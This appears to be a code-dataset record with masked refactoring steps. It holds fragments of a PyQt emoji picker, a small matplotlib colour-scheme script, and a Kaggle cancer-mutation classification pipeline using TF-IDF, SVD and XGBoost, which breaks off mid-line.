((selectedEmojiPosition[0]-newPosition[0])==0):\n newPosition[1]=0\n #horizontal wraparound through LEFT edge for NON FULL rows\n elif (newPosition[0]>=fullRowsCount) and (newPosition[1]<0):\n newPosition[1]=lastRowEmojiCount-1\n #vertical wraparound through BOTTOM edge for full cols\n elif (newPosition[0]>fullRowsCount) and (newPosition[1]<lastRowEmojiCount):\n newPosition[0]=0\n #vertical wraparound through TOP edge for full cols\n elif (newPosition[0]<0) and (newPosition[1]<lastRowEmojiCount):\n newPosition[0]=fullRowsCount\n #vertical wraparound through BOTTOM edge for NON FULL cols\n elif (newPosition[0]>fullRowsCount-1) and (newPosition[1]>lastRowEmojiCount-1):\n newPosition[0]=0\n #vertical wraparound through TOP edge for NON FULL cols\n elif (newPosition[0]<0) and (newPosition[1]>lastRowEmojiCount-1):\n newPosition[0]=fullRowsCount-1\n\n oldPosition = selectedEmojiPosition\n selectedEmojiPosition = newPosition\n \n widgetToDeselect = emojiGridLayout.itemAtPosition(oldPosition[0],oldPosition[1])\n if widgetToDeselect:\n widgetToDeselect = widgetToDeselect.widget()\n widgetToDeselect.setStyleSheet(\"\")\n\n global selectedEmojiChar\n widgetToSelect = emojiGridLayout.itemAtPosition(selectedEmojiPosition[0],selectedEmojiPosition[1])\n if widgetToSelect:\n widgetToSelect = widgetToSelect.widget()\n selectedEmojiChar = widgetToSelect.text()\n widgetToSelect.setStyleSheet(\"QLabel{background-color: palette(highlight);}\")\n \n# handles direction where to move emoji selection\ndef move_selection(direction):\n if direction==\"right\":\n highlight_emoji([sum(x) for x in zip(selectedEmojiPosition, [0,1])])\n elif direction==\"left\":\n highlight_emoji([sum(x) for x in zip(selectedEmojiPosition, [0,-1])])\n elif direction==\"up\":\n highlight_emoji([sum(x) for x in zip(selectedEmojiPosition, [-1,0])])\n elif direction==\"down\":\n highlight_emoji([sum(x) for x in zip(selectedEmojiPosition, [1,0])])\n\n# handles Esc\ndef on_key(key):\n # test for a specific key\n if key == Qt.Key_Escape:\n quitNicely()\n\n# adds given emoji to history and saves it to config file\ndef add_char_to_history(char):\n global settingsFile\n global historyList\n if not historyList:\n historyList = [char]\n else:\n if char in historyList:\n historyList.remove(char)\n \n tempList = [char]\n tempList.extend(historyList)\n historyList = tempList[:(emojiGridColumnCount*emojiGridRowCount)] \n \n settingsFile.setValue('history/history',historyList)\n\n# wrapper around filling the grid\ndef fill_grid_with_history():\n fill_grid_with_char_list(historyList)\n\n# main app window class with inits\nclass EmojiPickerWindow(QWidget):\n\n def __init__(self):\n super().__init__()\n\n # focus handling\n self.installEventFilter(self)\n\n self.title = 'Emoji picker \(^o^)/'\n self.width = 281\n self.height = 251\n\n # start with text box centered at mouse pointer position\n self.left, self.top = mousePosition() \n self.left -= self.width//2\n self.top += (24-self.height)\n\n self.initSettings()\n self.initUI()\n \n def initUI(self):\n # topmost window layout \n layout = QVBoxLayout() \n\n global layoutStack\n layoutStack = QStackedLayout()\n layoutStackWidget = QWidget()\n layoutStackWidget.setLayout(layoutStack)\n\n # scroll area setup shenanigans\n scrollArea = QScrollArea() \n gridWidget = QWidget()\n global emojiGridLayout\n emojiGridLayout = QGridLayout(gridWidget)\n emojiGridLayout.setAlignment(Qt.AlignTop | Qt.AlignLeft)\n\n\n\n # stretch grid to widget\n for col in range(emojiGridColumnCount):\n emojiGridLayout.setColumnStretch(col,1)\n for row in range(emojiGridRowCount):\n emojiGridLayout.setRowStretch(row,1)\n\n scrollArea.setWidget(gridWidget)\n scrollArea.setWidgetResizable(True)\n layoutStack.addWidget(scrollArea)\n\n # info to show when no emoji has been found\n noEmojiFoundLabel = QLabel(\"No emoji found 🙁\")\n noEmojiFoundLabel.setAlignment(Qt.AlignCenter | Qt.AlignHCenter | Qt.AlignVCenter)\n layoutStack.addWidget(noEmojiFoundLabel) \n layout.addWidget(layoutStackWidget)\n\n # fill with a placeholder for now (smiling or smile)\n # execute_search('smil')\n fill_grid_with_history()\n # bottom text entry\n lineEdit = QLineEditWithArrows() \n lineEdit.textChanged.connect(execute_search)\n layout.addWidget(lineEdit)\n\n # align it to the bottom, so that it won't stay centered vertically\n layout.setAlignment(lineEdit, Qt.AlignBottom)\n\n\n self.setLayout(layout)\n self.setWindowTitle(self.title)\n self.setGeometry(self.left, self.top, self.width, self.height)\n self.setFixedSize(self.width, self.height)\n self.setWindowFlags(Qt.FramelessWindowHint | Qt.WindowStaysOnTopHint)\n\n # needed for filling the grid out from the outside\n global mainWindow\n mainWindow = self\n\n # esc handling\n self.keyPressed.connect(on_key)\n\n self.show()\n lineEdit.setFocus()\n \n def initSettings(self):\n global settingsFile\n global historyList\n settingsFile = QSettings(\"emoji-picker-qtpy\", \"history\");\n historyList = settingsFile.value('history/history')\n\n # key handling\n keyPressed = pyqtSignal(int)\n def keyPressEvent(self, event):\n super(EmojiPickerWindow, self).keyPressEvent(event)\n self.keyPressed.emit(event.key())\n\n # focus handling\n global willExitOnItsOwn\n def eventFilter(self, object, event):\n if event.type()== QEvent.WindowDeactivate or event.type()== QEvent.FocusOut:\n if (not willExitOnItsOwn):\n quitNicely()\n return False\n\n# clickable label\nclass QClickableLabel(QLabel):\n clicked=pyqtSignal(str)\n def __init__(self, parent=None):\n QLabel.__init__(self, parent)\n\n def mousePressEvent(self, ev):\n self.clicked.emit(self.text()) \n\n def enterEvent(self, ev):\n emoji_hovered(self)\n\n# keyboard handling override for QlineEdit\nclass QLineEditWithArrows(QLineEdit):\n def keyPressEvent(self, ev):\n global selectedEmojiChar\n global foundAnyEmoji\n if(ev.key() == Qt.Key_Right):\n move_selection(\"right\")\n if(ev.key() == Qt.Key_Left):\n move_selection(\"left\")\n if(ev.key() == Qt.Key_Up):\n move_selection(\"up\")\n if(ev.key() == Qt.Key_Down):\n move_selection(\"down\")\n if(ev.key() == Qt.Key_Return or ev.key() == Qt.Key_Enter):\n if foundAnyEmoji:\n execute_emoji(selectedEmojiChar)\n else:\n quitNicely()\n if(ev.key() == Qt.Key_Tab):\n pass\n else:\n QLineEdit.keyPressEvent(self,ev)\n \nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = EmojiPickerWindow()\n sys.exit(app.exec_())\n", "step-ids": [ 17, 19, 21, 24, 29 ] }
[ 17, 19, 21, 24, 29 ]
from ScientificColorschemez import Colorschemez import matplotlib.pyplot as plt cs = Colorschemez.latest() for name, hexcode in zip(cs.colornames, cs.colors): print('%s: %s' % (hexcode, name)) fig, ax = plt.subplots() cs.example_plot(ax) fig.savefig('latest.png', dpi=200, bbox_inches='tight')
normal
{ "blob_id": "7106a8ddbec60ce4b7d9e8e5ce8d7df02e5f7222", "index": 6854, "step-1": "<mask token>\n", "step-2": "<mask token>\nfor name, hexcode in zip(cs.colornames, cs.colors):\n print('%s: %s' % (hexcode, name))\n<mask token>\ncs.example_plot(ax)\nfig.savefig('latest.png', dpi=200, bbox_inches='tight')\n", "step-3": "<mask token>\ncs = Colorschemez.latest()\nfor name, hexcode in zip(cs.colornames, cs.colors):\n print('%s: %s' % (hexcode, name))\nfig, ax = plt.subplots()\ncs.example_plot(ax)\nfig.savefig('latest.png', dpi=200, bbox_inches='tight')\n", "step-4": "from ScientificColorschemez import Colorschemez\nimport matplotlib.pyplot as plt\ncs = Colorschemez.latest()\nfor name, hexcode in zip(cs.colornames, cs.colors):\n print('%s: %s' % (hexcode, name))\nfig, ax = plt.subplots()\ncs.example_plot(ax)\nfig.savefig('latest.png', dpi=200, bbox_inches='tight')\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
#################################################################################### # # Kaggle Competition: https://www.kaggle.com/c/msk-redefining-cancer-treatment # Sponsor : Memorial Sloan Kettering Cancer Center (MSKCC) # Author: Amrut Shintre # #################################################################################### ##################### # Importing Libraries ##################### import numpy as np import pandas as pd import matplotlib as plt import re import nltk nltk.download('stopwords') from nltk.corpus import stopwords from nltk.stem.porter import PorterStemmer from sklearn.feature_extraction.text import TfidfVectorizer from sklearn.decomposition import TruncatedSVD from sklearn.preprocessing import LabelEncoder from sklearn.preprocessing import StandardScaler import xgboost as xgb from sklearn.model_selection import train_test_split from sklearn import metrics import gc import random #################### # Importing datasets #################### # Training Dataset train_df = pd.read_csv('training_text', sep = '\|\|', engine = 'python', names = ['ID', 'Text'], header = None) train_df = train_df.iloc[1:,:] train_df.index = range(len(train_df)) train_var = pd.read_csv('training_variants') # Testing Dataset test_df = pd.read_csv('test_text', sep = '\|\|', engine = 'python', names = ['ID', 'Text'], header = None) test_var = pd.read_csv('test_variants') # --------------------------------------------TEXT --------------------------------------------- ############## # TextCleaning ############## def text_cleaning(text_df): corpus = [] for i in range(len(text_df)): text = re.sub('[^a-zA-Z]', ' ', text_df['Text'][i]) # Removing punctuation marks, #numbers, etc and returning only letters text = text.lower() # Converting all the uppercase letters to lowercase text = text.split() # Splitting a sentence into a list of strings containing a single word. ps = PorterStemmer() # Stemming e.g. lovely -> love text = [ps.stem(word) for word in text if not word in set(stopwords.words('english'))] text = ' '.join(text) # Joining the cleaned words corpus.append(text) # Appending it to the new list. return (corpus) # Training Text Data corpus_train = text_cleaning(train_df) # Testing Text Data corpus_test = text_cleaning(test_df) ############################################# # Term Frequency - Inverse Document Frequency ############################################# tfidf = TfidfVectorizer() tfidf_tr = tfidf.fit_transform(corpus_train).toarray() tfidf_test = tfidf.transform(corpus_test).toarray() ############################## # Singular Value Decomposition ############################## svd = TruncatedSVD(n_components = 1000) # considering 98% variance in the Data svd_tr = svd.fit_transform(tfidf_tr) # Fitting on cleaned training text data svd_train = svd.transform(tfidf_test) # Transforming on cleaned testing text data svd_tr = pd.DataFrame(svd_tr) svd_test = pd.DataFrame(svd_train) #explainedvar = svd.explained_variance_ratio_ #exp_var = explainedvar.cumsum() # -------------------------------------------- VARIANTS --------------------------------------------- #################### # Dependent Variable #################### y = train_var['Class'].values y = y-1 ################# # Merging Dataset ################# # Merging the dataset for data preparation and feature engineering df = pd.concat([train_var, test_var], axis = 0) df = df.drop(['ID'], axis = 1) df['ID'] = range(df.shape[0]) df.index = range(df.shape[0]) df_text = pd.concat([train_df, test_df], axis = 0) df_text = df_text.drop('ID', axis = 1) df_text['ID'] = range(df_text.shape[0]) df_text.index = range(df_text.shape[0]) df_all = pd.merge(df, df_text, how = 'left', on = 'ID') ################ # Missing Values ################ # Checking for missing values column_list = train_var.columns.values.tolist() missing_values = pd.DataFrame() missing_values['Columns'] = column_list for i in column_list: missing_values['No. of missing values'] = train_var[i].isnull().values.ravel().sum() # There are no missing values. ####################### # Categorical Variables ####################### # Extracting the columns having categorical Variables. column_list = df.columns categorical_columns = [] for i in column_list: if df[i].dtype == 'O': categorical_columns.append(i) # Encoding the columns with categorical variables # Label Encoding for i in categorical_columns: le = LabelEncoder() df[i + '_le'] = le.fit_transform(df[i]) df[i + '_length'] = df[i].map(lambda x: len(str(x))) # Feature Engineering df_all['Gene_Share'] = df_all.apply(lambda r: sum([1 for w in r['Gene'].split(' ') if w in r['Text'].split(' ')]), axis=1) df_all['Variation_Share'] = df_all.apply(lambda r: sum([1 for w in r['Variation'].split(' ') if w in r['Text'].split(' ')]), axis=1) ################### # Splitting Dataset ################### train = df_all.iloc[:len(train_var), :] test = df_all.iloc[len(train_var):,:] test.index = range(len(test_var)) train = train.drop(['Gene', 'Variation', 'ID', 'Text', 'Class'], axis = 1) test = test.drop(['Gene', 'Variation', 'Text', 'ID', 'Class'], axis = 1) train_final = pd.concat([train, svd_tr], axis = 1) test_final = pd.concat([test, svd_test], axis = 1) ################# # Standardization ################# sc = StandardScaler() train_final = sc.fit_transform(train_final) test_final = sc.transform(test_final) train_final = pd.DataFrame(train_final) test_final = pd.DataFrame(test_final) # -------------------------------------------- MODEL --------------------------------------------- ################## # XGBoost Matrix ################## dtrain = xgb.DMatrix(train_final, y) dtest = xgb.DMatrix(test_final) ################## # Cross-Validation ################## def docv(param, iterations, nfold): model_CV = xgb.cv( params = param, num_boost_round = iterations, nfold = nfold, dtrain = dtrain, seed = random.randint(1, 10000), early_stopping_rounds = 100, maximize = False, verbose_eval = 50) gc.collect() best = min(model_CV['test-mlogloss-mean']) best_iter = model_CV.shape[0] print (best) return (best_iter) ######### # Testing ######### def doTest(param, iteration): X_tr, X_val, y_tr, y_val = train_test_split(train_final, y, test_size = 0.2, random_state = random.randint(1,1000)) watchlist = [(xgb.DMatrix(X_tr, y_tr), 'train'), (xgb.DMatrix(X_val, y_val), 'validation')] model = xgb.train( params = param, dtrain = xgb.DMatrix(X_tr, y_tr), num_boost_round = iteration, evals = watchlist, verbose_eval = 50, early_stopping_rounds = 100) score = metrics.log_loss(y_val, model.predict(xgb.DMatrix(X_val)), labels = range(9)) predicted_class = model.predict(dtest) print (score) return (predicted_class) ######### # Bagging ######### def Bagging(N, params, best_iter): for i in range(N): param = params p = doTest(param, best_iter) if i == 0: preds = p.copy() else: preds = preds + p predictions = preds/N predictions = pd.DataFrame(predictions) return (predictions) ################### # Running the Model ################### params = { 'eta': 0.02, 'max_depth': 6, 'objective': 'multi:softprob', 'eval_metric': 'mlogloss', 'silent': False, 'seed': random.randint(1,100), 'num_class': 9 } cross_vali = docv(params, 10000, 5) predicted_class = Bagging(5, params, cross_vali) # -------------------------------------------- SUBMISSION --------------------------------------------- sub_file = pd.DataFrame() sub_file['ID'] = test_var['ID'].values Sub_File = pd.concat([sub_file, predicted_class], axis = 1) Sub_File.columns = ['ID', 'Class1', 'Class2', 'Class3', 'Class4', 'Class5', 'Class6', 'Class7', 'Class8', 'Class9'] Sub_File.to_csv("submission33.csv", index = False) # -------------------------------------------- Project Layout --------------------------------------------- # 1) Text Cleaning # 2) TFIDF Vectorizer and Singular Value Decomposition # 3) Feature Engineering # 4) Building a Model and trying out different models # 5) Parameter Tuning # 6) Bagged Boosting
normal
{ "blob_id": "1305991a9cd82ddeaffff1545a35ced992e6792f", "index": 7300, "step-1": "<mask token>\n\n\ndef text_cleaning(text_df):\n corpus = []\n for i in range(len(text_df)):\n text = re.sub('[^a-zA-Z]', ' ', text_df['Text'][i])\n text = text.lower()\n text = text.split()\n ps = PorterStemmer()\n text = [ps.stem(word) for word in text if not word in set(stopwords\n .words('english'))]\n text = ' '.join(text)\n corpus.append(text)\n return corpus\n\n\n<mask token>\n\n\ndef docv(param, iterations, nfold):\n model_CV = xgb.cv(params=param, num_boost_round=iterations, nfold=nfold,\n dtrain=dtrain, seed=random.randint(1, 10000), early_stopping_rounds\n =100, maximize=False, verbose_eval=50)\n gc.collect()\n best = min(model_CV['test-mlogloss-mean'])\n best_iter = model_CV.shape[0]\n print(best)\n return best_iter\n\n\ndef doTest(param, iteration):\n X_tr, X_val, y_tr, y_val = train_test_split(train_final, y, test_size=\n 0.2, random_state=random.randint(1, 1000))\n watchlist = [(xgb.DMatrix(X_tr, y_tr), 'train'), (xgb.DMatrix(X_val,\n y_val), 'validation')]\n model = xgb.train(params=param, dtrain=xgb.DMatrix(X_tr, y_tr),\n num_boost_round=iteration, evals=watchlist, verbose_eval=50,\n early_stopping_rounds=100)\n score = metrics.log_loss(y_val, model.predict(xgb.DMatrix(X_val)),\n labels=range(9))\n predicted_class = model.predict(dtest)\n print(score)\n return predicted_class\n\n\ndef Bagging(N, params, best_iter):\n for i in range(N):\n param = params\n p = doTest(param, best_iter)\n if i == 0:\n preds = p.copy()\n else:\n preds = preds + p\n predictions = preds / N\n predictions = pd.DataFrame(predictions)\n return predictions\n\n\n<mask token>\n", "step-2": "<mask token>\nnltk.download('stopwords')\n<mask token>\n\n\ndef text_cleaning(text_df):\n corpus = []\n for i in range(len(text_df)):\n text = re.sub('[^a-zA-Z]', ' ', text_df['Text'][i])\n text = text.lower()\n text = text.split()\n ps = PorterStemmer()\n text = [ps.stem(word) for word in text if not word in set(stopwords\n .words('english'))]\n text = ' '.join(text)\n corpus.append(text)\n return corpus\n\n\n<mask token>\nfor i in column_list:\n missing_values['No. of missing values'] = train_var[i].isnull(\n ).values.ravel().sum()\n<mask token>\nfor i in column_list:\n if df[i].dtype == 'O':\n categorical_columns.append(i)\nfor i in categorical_columns:\n le = LabelEncoder()\n df[i + '_le'] = le.fit_transform(df[i])\n df[i + '_length'] = df[i].map(lambda x: len(str(x)))\n<mask token>\n\n\ndef docv(param, iterations, nfold):\n model_CV = xgb.cv(params=param, num_boost_round=iterations, nfold=nfold,\n dtrain=dtrain, seed=random.randint(1, 10000), early_stopping_rounds\n =100, maximize=False, verbose_eval=50)\n gc.collect()\n best = min(model_CV['test-mlogloss-mean'])\n best_iter = model_CV.shape[0]\n print(best)\n return best_iter\n\n\ndef doTest(param, iteration):\n X_tr, X_val, y_tr, y_val = train_test_split(train_final, y, test_size=\n 0.2, random_state=random.randint(1, 1000))\n watchlist = [(xgb.DMatrix(X_tr, y_tr), 'train'), (xgb.DMatrix(X_val,\n y_val), 'validation')]\n model = xgb.train(params=param, dtrain=xgb.DMatrix(X_tr, y_tr),\n num_boost_round=iteration, evals=watchlist, verbose_eval=50,\n early_stopping_rounds=100)\n score = metrics.log_loss(y_val, model.predict(xgb.DMatrix(X_val)),\n labels=range(9))\n predicted_class = model.predict(dtest)\n print(score)\n return predicted_class\n\n\ndef Bagging(N, params, best_iter):\n for i in range(N):\n param = params\n p = doTest(param, best_iter)\n if i == 0:\n preds = p.copy()\n else:\n preds = preds + p\n predictions = preds / N\n predictions = pd.DataFrame(predictions)\n return predictions\n\n\n<mask token>\nSub_File.to_csv('submission33.csv', index=False)\n", "step-3": "<mask token>\nnltk.download('stopwords')\n<mask token>\ntrain_df = pd.read_csv('training_text', sep='\\\\|\\\\|', engine='python',\n names=['ID', 'Text'], header=None)\ntrain_df = train_df.iloc[1:, :]\ntrain_df.index = range(len(train_df))\ntrain_var = pd.read_csv('training_variants')\ntest_df = pd.read_csv('test_text', sep='\\\\|\\\\|', engine='python', names=[\n 'ID', 'Text'], header=None)\ntest_var = pd.read_csv('test_variants')\n\n\ndef text_cleaning(text_df):\n corpus = []\n for i in range(len(text_df)):\n text = re.sub('[^a-zA-Z]', ' ', text_df['Text'][i])\n text = text.lower()\n text = text.split()\n ps = PorterStemmer()\n text = [ps.stem(word) for word in text if not word in set(stopwords\n .words('english'))]\n text = ' '.join(text)\n corpus.append(text)\n return corpus\n\n\ncorpus_train = text_cleaning(train_df)\ncorpus_test = text_cleaning(test_df)\ntfidf = TfidfVectorizer()\ntfidf_tr = tfidf.fit_transform(corpus_train).toarray()\ntfidf_test = tfidf.transform(corpus_test).toarray()\nsvd = TruncatedSVD(n_components=1000)\nsvd_tr = svd.fit_transform(tfidf_tr)\nsvd_train = svd.transform(tfidf_test)\nsvd_tr = pd.DataFrame(svd_tr)\nsvd_test = pd.DataFrame(svd_train)\ny = train_var['Class'].values\ny = y - 1\ndf = pd.concat([train_var, test_var], axis=0)\ndf = df.drop(['ID'], axis=1)\ndf['ID'] = range(df.shape[0])\ndf.index = range(df.shape[0])\ndf_text = pd.concat([train_df, test_df], axis=0)\ndf_text = df_text.drop('ID', axis=1)\ndf_text['ID'] = range(df_text.shape[0])\ndf_text.index = range(df_text.shape[0])\ndf_all = pd.merge(df, df_text, how='left', on='ID')\ncolumn_list = train_var.columns.values.tolist()\nmissing_values = pd.DataFrame()\nmissing_values['Columns'] = column_list\nfor i in column_list:\n missing_values['No. of missing values'] = train_var[i].isnull(\n ).values.ravel().sum()\ncolumn_list = df.columns\ncategorical_columns = []\nfor i in column_list:\n if df[i].dtype == 'O':\n categorical_columns.append(i)\nfor i in categorical_columns:\n le = LabelEncoder()\n df[i + '_le'] = le.fit_transform(df[i])\n df[i + '_length'] = df[i].map(lambda x: len(str(x)))\ndf_all['Gene_Share'] = df_all.apply(lambda r: sum([(1) for w in r['Gene'].\n split(' ') if w in r['Text'].split(' ')]), axis=1)\ndf_all['Variation_Share'] = df_all.apply(lambda r: sum([(1) for w in r[\n 'Variation'].split(' ') if w in r['Text'].split(' ')]), axis=1)\ntrain = df_all.iloc[:len(train_var), :]\ntest = df_all.iloc[len(train_var):, :]\ntest.index = range(len(test_var))\ntrain = train.drop(['Gene', 'Variation', 'ID', 'Text', 'Class'], axis=1)\ntest = test.drop(['Gene', 'Variation', 'Text', 'ID', 'Class'], axis=1)\ntrain_final = pd.concat([train, svd_tr], axis=1)\ntest_final = pd.concat([test, svd_test], axis=1)\nsc = StandardScaler()\ntrain_final = sc.fit_transform(train_final)\ntest_final = sc.transform(test_final)\ntrain_final = pd.DataFrame(train_final)\ntest_final = pd.DataFrame(test_final)\ndtrain = xgb.DMatrix(train_final, y)\ndtest = xgb.DMatrix(test_final)\n\n\ndef docv(param, iterations, nfold):\n model_CV = xgb.cv(params=param, num_boost_round=iterations, nfold=nfold,\n dtrain=dtrain, seed=random.randint(1, 10000), early_stopping_rounds\n =100, maximize=False, verbose_eval=50)\n gc.collect()\n best = min(model_CV['test-mlogloss-mean'])\n best_iter = model_CV.shape[0]\n print(best)\n return best_iter\n\n\ndef doTest(param, iteration):\n X_tr, X_val, y_tr, y_val = train_test_split(train_final, y, test_size=\n 0.2, random_state=random.randint(1, 1000))\n watchlist = [(xgb.DMatrix(X_tr, y_tr), 'train'), (xgb.DMatrix(X_val,\n y_val), 'validation')]\n model = xgb.train(params=param, dtrain=xgb.DMatrix(X_tr, y_tr),\n num_boost_round=iteration, evals=watchlist, verbose_eval=50,\n early_stopping_rounds=100)\n score = metrics.log_loss(y_val, model.predict(xgb.DMatrix(X_val)),\n labels=range(9))\n predicted_class = model.predict(dtest)\n print(score)\n return predicted_class\n\n\ndef Bagging(N, params, best_iter):\n for i in range(N):\n param = params\n p = doTest(param, best_iter)\n if i == 0:\n preds = p.copy()\n else:\n preds = preds + p\n predictions = preds / N\n predictions = pd.DataFrame(predictions)\n return predictions\n\n\nparams = {'eta': 0.02, 'max_depth': 6, 'objective': 'multi:softprob',\n 'eval_metric': 'mlogloss', 'silent': False, 'seed': random.randint(1, \n 100), 'num_class': 9}\ncross_vali = docv(params, 10000, 5)\npredicted_class = Bagging(5, params, cross_vali)\nsub_file = pd.DataFrame()\nsub_file['ID'] = test_var['ID'].values\nSub_File = pd.concat([sub_file, predicted_class], axis=1)\nSub_File.columns = ['ID', 'Class1', 'Class2', 'Class3', 'Class4', 'Class5',\n 'Class6', 'Class7', 'Class8', 'Class9']\nSub_File.to_csv('submission33.csv', index=False)\n", "step-4": "import numpy as np\nimport pandas as pd\nimport matplotlib as plt\nimport re\nimport nltk\nnltk.download('stopwords')\nfrom nltk.corpus import stopwords\nfrom nltk.stem.porter import PorterStemmer\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.decomposition import TruncatedSVD\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.preprocessing import StandardScaler\nimport xgboost as xgb\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import metrics\nimport gc\nimport random\ntrain_df = pd.read_csv('training_text', sep='\\\\|\\\\|', engine='python',\n names=['ID', 'Text'], header=None)\ntrain_df = train_df.iloc[1:, :]\ntrain_df.index = range(len(train_df))\ntrain_var = pd.read_csv('training_variants')\ntest_df = pd.read_csv('test_text', sep='\\\\|\\\\|', engine='python', names=[\n 'ID', 'Text'], header=None)\ntest_var = pd.read_csv('test_variants')\n\n\ndef text_cleaning(text_df):\n corpus = []\n for i in range(len(text_df)):\n text = re.sub('[^a-zA-Z]', ' ', text_df['Text'][i])\n text = text.lower()\n text = text.split()\n ps = PorterStemmer()\n text = [ps.stem(word) for word in text if not word in set(stopwords\n .words('english'))]\n text = ' '.join(text)\n corpus.append(text)\n return corpus\n\n\ncorpus_train = text_cleaning(train_df)\ncorpus_test = text_cleaning(test_df)\ntfidf = TfidfVectorizer()\ntfidf_tr = tfidf.fit_transform(corpus_train).toarray()\ntfidf_test = tfidf.transform(corpus_test).toarray()\nsvd = TruncatedSVD(n_components=1000)\nsvd_tr = svd.fit_transform(tfidf_tr)\nsvd_train = svd.transform(tfidf_test)\nsvd_tr = pd.DataFrame(svd_tr)\nsvd_test = pd.DataFrame(svd_train)\ny = train_var['Class'].values\ny = y - 1\ndf = pd.concat([train_var, test_var], axis=0)\ndf = df.drop(['ID'], axis=1)\ndf['ID'] = range(df.shape[0])\ndf.index = range(df.shape[0])\ndf_text = pd.concat([train_df, test_df], axis=0)\ndf_text = df_text.drop('ID', axis=1)\ndf_text['ID'] = range(df_text.shape[0])\ndf_text.index = range(df_text.shape[0])\ndf_all = pd.merge(df, df_text, how='left', on='ID')\ncolumn_list = train_var.columns.values.tolist()\nmissing_values = pd.DataFrame()\nmissing_values['Columns'] = column_list\nfor i in column_list:\n missing_values['No. of missing values'] = train_var[i].isnull(\n ).values.ravel().sum()\ncolumn_list = df.columns\ncategorical_columns = []\nfor i in column_list:\n if df[i].dtype == 'O':\n categorical_columns.append(i)\nfor i in categorical_columns:\n le = LabelEncoder()\n df[i + '_le'] = le.fit_transform(df[i])\n df[i + '_length'] = df[i].map(lambda x: len(str(x)))\ndf_all['Gene_Share'] = df_all.apply(lambda r: sum([(1) for w in r['Gene'].\n split(' ') if w in r['Text'].split(' ')]), axis=1)\ndf_all['Variation_Share'] = df_all.apply(lambda r: sum([(1) for w in r[\n 'Variation'].split(' ') if w in r['Text'].split(' ')]), axis=1)\ntrain = df_all.iloc[:len(train_var), :]\ntest = df_all.iloc[len(train_var):, :]\ntest.index = range(len(test_var))\ntrain = train.drop(['Gene', 'Variation', 'ID', 'Text', 'Class'], axis=1)\ntest = test.drop(['Gene', 'Variation', 'Text', 'ID', 'Class'], axis=1)\ntrain_final = pd.concat([train, svd_tr], axis=1)\ntest_final = pd.concat([test, svd_test], axis=1)\nsc = StandardScaler()\ntrain_final = sc.fit_transform(train_final)\ntest_final = sc.transform(test_final)\ntrain_final = pd.DataFrame(train_final)\ntest_final = pd.DataFrame(test_final)\ndtrain = xgb.DMatrix(train_final, y)\ndtest = xgb.DMatrix(test_final)\n\n\ndef docv(param, iterations, nfold):\n model_CV = xgb.cv(params=param, num_boost_round=iterations, nfold=nfold,\n dtrain=dtrain, seed=random.randint(1, 10000), early_stopping_rounds\n =100, maximize=False, verbose_eval=50)\n gc.collect()\n best = min(model_CV['test-mlogloss-mean'])\n best_iter = model_CV.shape[0]\n print(best)\n return best_iter\n\n\ndef doTest(param, iteration):\n X_tr, X_val, y_tr, y_val = train_test_split(train_final, y, test_size=\n 0.2, random_state=random.randint(1, 1000))\n watchlist = [(xgb.DMatrix(X_tr, y_tr), 'train'), (xgb.DMatrix(X_val,\n y_val), 'validation')]\n model = xgb.train(params=param, dtrain=xgb.DMatrix(X_tr, y_tr),\n num_boost_round=iteration, evals=watchlist, verbose_eval=50,\n early_stopping_rounds=100)\n score = metrics.log_loss(y_val, model.predict(xgb.DMatrix(X_val)),\n labels=range(9))\n predicted_class = model.predict(dtest)\n print(score)\n return predicted_class\n\n\ndef Bagging(N, params, best_iter):\n for i in range(N):\n param = params\n p = doTest(param, best_iter)\n if i == 0:\n preds = p.copy()\n else:\n preds = preds + p\n predictions = preds / N\n predictions = pd.DataFrame(predictions)\n return predictions\n\n\nparams = {'eta': 0.02, 'max_depth': 6, 'objective': 'multi:softprob',\n 'eval_metric': 'mlogloss', 'silent': False, 'seed': random.randint(1, \n 100), 'num_class': 9}\ncross_vali = docv(params, 10000, 5)\npredicted_class = Bagging(5, params, cross_vali)\nsub_file = pd.DataFrame()\nsub_file['ID'] = test_var['ID'].values\nSub_File = pd.concat([sub_file, predicted_class], axis=1)\nSub_File.columns = ['ID', 'Class1', 'Class2', 'Class3', 'Class4', 'Class5',\n 'Class6', 'Class7', 'Class8', 'Class9']\nSub_File.to_csv('submission33.csv', index=False)\n", "step-5": "####################################################################################\n#\n# Kaggle Competition: https://www.kaggle.com/c/msk-redefining-cancer-treatment\n# Sponsor : Memorial Sloan Kettering Cancer Center (MSKCC)\n# Author: Amrut Shintre\n#\n####################################################################################\n\n#####################\n# Importing Libraries\n#####################\nimport numpy as np\nimport pandas as pd\nimport matplotlib as plt\nimport re\nimport nltk\nnltk.download('stopwords')\nfrom nltk.corpus import stopwords\nfrom nltk.stem.porter import PorterStemmer\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.decomposition import TruncatedSVD\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.preprocessing import StandardScaler\nimport xgboost as xgb\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import metrics\nimport gc\nimport random\n\n####################\n# Importing datasets\n####################\n\n# Training Dataset\ntrain_df = pd.read_csv('training_text', sep = '\\|\\|', engine = 'python', names = ['ID', 'Text'],\n header = None)\ntrain_df = train_df.iloc[1:,:]\ntrain_df.index = range(len(train_df))\ntrain_var = pd.read_csv('training_variants')\n\n# Testing Dataset\ntest_df = pd.read_csv('test_text', sep = '\\|\\|', engine = 'python', names = ['ID', 'Text'],\n header = None)\ntest_var = pd.read_csv('test_variants')\n\n# --------------------------------------------TEXT ---------------------------------------------\n\n##############\n# TextCleaning\n##############\n\ndef text_cleaning(text_df):\n corpus = []\n for i in range(len(text_df)):\n text = re.sub('[^a-zA-Z]', ' ', text_df['Text'][i]) # Removing punctuation marks,\n #numbers, etc and returning only letters\n text = text.lower() # Converting all the uppercase letters to lowercase\n text = text.split() # Splitting a sentence into a list of strings containing a single word.\n ps = PorterStemmer() # Stemming e.g. lovely -> love\n text = [ps.stem(word) for word in text if not word in set(stopwords.words('english'))]\n text = ' '.join(text) # Joining the cleaned words\n corpus.append(text) # Appending it to the new list.\n return (corpus)\n\n# Training Text Data\ncorpus_train = text_cleaning(train_df)\n\n# Testing Text Data\ncorpus_test = text_cleaning(test_df)\n\n#############################################\n# Term Frequency - Inverse Document Frequency\n#############################################\n\ntfidf = 